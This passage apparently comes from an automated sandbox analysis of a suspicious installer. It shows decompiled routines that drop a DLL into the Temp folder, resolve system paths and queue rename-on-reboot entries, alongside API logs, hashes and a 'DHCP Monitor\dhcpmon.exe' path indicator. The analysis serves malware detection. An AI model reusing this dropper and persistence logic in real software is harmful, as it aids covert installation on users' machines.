                                                                    • lstrcatA.KERNEL32(?,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 004048D6
                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048E8
                                                                      • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                      • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                      • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                      • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                      • Part of subcall function 00406528: CharPrevA.USER32(?,?,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                    • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                                      • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                      • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                      • Part of subcall function 00404B1A: SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                    Strings
                                                                    • A, xrefs: 00404886
                                                                    • C:\Users\user~1\AppData\Local\Temp, xrefs: 004048B3
                                                                    • Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 004048C4, 004048C9, 004048D4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A$C:\Users\user~1\AppData\Local\Temp$Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                    • API String ID: 2624150263-2441780782
                                                                    • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                    • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                    • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                    • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                    0x00405ebc
                                                                    0x00405ec5
                                                                    0x00405ecc
                                                                    0x00405ee0
                                                                    0x00405f08
                                                                    0x00405f13
                                                                    0x00405f17
                                                                    0x00405f37
                                                                    0x00405f3e
                                                                    0x00405f48
                                                                    0x00405f55
                                                                    0x00405f5a
                                                                    0x00405f5f
                                                                    0x00405f63
                                                                    0x00405f72
                                                                    0x00405f74
                                                                    0x00405f81
                                                                    0x00405f85
                                                                    0x00406020
                                                                    0x00000000
                                                                    0x00405f9b
                                                                    0x00405fa8
                                                                    0x00405fcc
                                                                    0x00405fd0
                                                                    0x00405fef
                                                                    0x00405ff3
                                                                    0x00405ff3
                                                                    0x00405ff5
                                                                    0x00405ffe
                                                                    0x00406009
                                                                    0x00406014
                                                                    0x0040601a
                                                                    0x00000000
                                                                    0x0040601a
                                                                    0x00405fd2
                                                                    0x00405fd5
                                                                    0x00405fe0
                                                                    0x00405fdc
                                                                    0x00405fde
                                                                    0x00405fdf
                                                                    0x00405fdf
                                                                    0x00405fe7
                                                                    0x00405fe9
                                                                    0x00000000
                                                                    0x00405fe9
                                                                    0x00405fb3
                                                                    0x00405fb9
                                                                    0x00000000
                                                                    0x00405fb9
                                                                    0x00405f85
                                                                    0x00405f63
                                                                    0x00405ee2
                                                                    0x00405eed
                                                                    0x00405ef6
                                                                    0x00405efa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405efa
                                                                    0x0040602b

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                                    • GetShortPathNameA.KERNEL32 ref: 00405EF6
                                                                      • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                      • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                    • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                                    • wsprintfA.USER32 ref: 00405F31
                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                    • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                    • GlobalFree.KERNEL32 ref: 0040601A
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                                      • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405DEA
                                                                      • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %s=%s$[Rename]
                                                                    • API String ID: 2171350718-1727408572
                                                                    • Opcode ID: 4151bb29c38b3ec919b1a0789aff65ba621a9168c6cb3f5890c8e46692059ba0
                                                                    • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                    • Opcode Fuzzy Hash: 4151bb29c38b3ec919b1a0789aff65ba621a9168c6cb3f5890c8e46692059ba0
                                                                    • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x4eecca
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}



























                                                                    0x004062e0
                                                                    0x004062e0
                                                                    0x004062e0
                                                                    0x004062e6
                                                                    0x004062eb
                                                                    0x004062ed
                                                                    0x004062fc
                                                                    0x004062fc
                                                                    0x00406304
                                                                    0x00406305
                                                                    0x00406306
                                                                    0x00406307
                                                                    0x0040630a
                                                                    0x00406312
                                                                    0x00406314
                                                                    0x0040632b
                                                                    0x0040632e
                                                                    0x0040632e
                                                                    0x00406505
                                                                    0x00406505
                                                                    0x00406509
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040633b
                                                                    0x00406341
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406347
                                                                    0x00406348
                                                                    0x0040634b
                                                                    0x0040634e
                                                                    0x004064f8
                                                                    0x00406502
                                                                    0x00406504
                                                                    0x00406504
                                                                    0x004064fa
                                                                    0x004064fc
                                                                    0x004064fe
                                                                    0x004064ff
                                                                    0x004064ff
                                                                    0x00000000
                                                                    0x004064f8
                                                                    0x00406354
                                                                    0x00406358
                                                                    0x00406368
                                                                    0x0040636f
                                                                    0x00406372
                                                                    0x0040637a
                                                                    0x0040637d
                                                                    0x00406384
                                                                    0x00406385
                                                                    0x00406388
                                                                    0x004064a5
                                                                    0x004064a8
                                                                    0x004064d8
                                                                    0x004064db
                                                                    0x004064e0
                                                                    0x004064e4
                                                                    0x004064e4
                                                                    0x004064e9
                                                                    0x004064ef
                                                                    0x004064f1
                                                                    0x00000000
                                                                    0x004064f1
                                                                    0x004064aa
                                                                    0x004064ad
                                                                    0x004064c2
                                                                    0x004064c9
                                                                    0x004064af
                                                                    0x004064b6
                                                                    0x004064b6
                                                                    0x004064d1
                                                                    0x004064d4
                                                                    0x0040649d
                                                                    0x0040649e
                                                                    0x0040649e
                                                                    0x00000000
                                                                    0x004064d4
                                                                    0x0040638e
                                                                    0x00406395
                                                                    0x00406397
                                                                    0x00406398
                                                                    0x004063b2
                                                                    0x004063b2
                                                                    0x004063b9
                                                                    0x004063b9
                                                                    0x004063c0
                                                                    0x004063c4
                                                                    0x004063c4
                                                                    0x004063c5
                                                                    0x004063c7
                                                                    0x00406400
                                                                    0x00406403
                                                                    0x00406413
                                                                    0x00406416
                                                                    0x0040641e
                                                                    0x00406424
                                                                    0x00406424
                                                                    0x00406483
                                                                    0x00406483
                                                                    0x00406485
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406428
                                                                    0x0040642f
                                                                    0x00406430
                                                                    0x00406432
                                                                    0x0040644c
                                                                    0x0040645a
                                                                    0x00406460
                                                                    0x00406462
                                                                    0x00406480
                                                                    0x00406480
                                                                    0x00406480
                                                                    0x00000000
                                                                    0x00406480
                                                                    0x00406468
                                                                    0x00406471
                                                                    0x00406474
                                                                    0x0040647a
                                                                    0x0040647e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040647e
                                                                    0x00406434
                                                                    0x00406437
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406446
                                                                    0x00406448
                                                                    0x0040644a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040644a
                                                                    0x00000000
                                                                    0x00406483
                                                                    0x0040640b
                                                                    0x00000000
                                                                    0x004063c9
                                                                    0x004063e4
                                                                    0x004063e9
                                                                    0x004063ec
                                                                    0x0040648c
                                                                    0x0040648c
                                                                    0x00406490
                                                                    0x00406498
                                                                    0x00406498
                                                                    0x00000000
                                                                    0x00406490
                                                                    0x004063f6
                                                                    0x00406487
                                                                    0x00406487
                                                                    0x0040648a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040648a
                                                                    0x004063c7
                                                                    0x0040639a
                                                                    0x0040639e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004063a0
                                                                    0x004063a4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004063a6
                                                                    0x004063aa
                                                                    0x00000000
                                                                    0x004063ac
                                                                    0x004063ac
                                                                    0x00000000
                                                                    0x004063ac
                                                                    0x004063aa
                                                                    0x0040650f
                                                                    0x00406519
                                                                    0x00406525
                                                                    0x00406525
                                                                    0x00000000

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0040640B
                                                                    • GetWindowsDirectoryA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                    • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                                    • SHGetPathFromIDListA.SHELL32(00000000,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 00406468
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                    • lstrcatA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                    • lstrlenA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 717251189-1823495724
                                                                    • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                    • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                    • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                    • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\ri8clfcgml62un.dll";
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(_t83, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
				} else {
					E0040624D();
				}
				E00406528(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, _t83);
						E004062E0(_t75, 0x40ac50, _t83, "Error opening file for writing: C:\Users\FRONTD~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("Error opening file for writing: C:\Users\FRONTD~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75);
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c);
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc));
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405969();
					goto L29;
				}
				goto L33;
			}

















                                                                    0x00401759
                                                                    0x00401760
                                                                    0x00401769
                                                                    0x0040176c
                                                                    0x0040176f
                                                                    0x00401774
                                                                    0x00401775
                                                                    0x0040177c
                                                                    0x00401798
                                                                    0x0040177e
                                                                    0x0040177f
                                                                    0x0040177f
                                                                    0x0040179e
                                                                    0x004017a8
                                                                    0x004017a8
                                                                    0x004017ac
                                                                    0x004017af
                                                                    0x004017b4
                                                                    0x004017b6
                                                                    0x004017b8
                                                                    0x004017bd
                                                                    0x004017bd
                                                                    0x004017c8
                                                                    0x004017c8
                                                                    0x004017d9
                                                                    0x004017db
                                                                    0x004017db
                                                                    0x004017dc
                                                                    0x004017dc
                                                                    0x004017df
                                                                    0x004017e2
                                                                    0x004017e5
                                                                    0x004017e5
                                                                    0x004017ec
                                                                    0x004017fb
                                                                    0x00401800
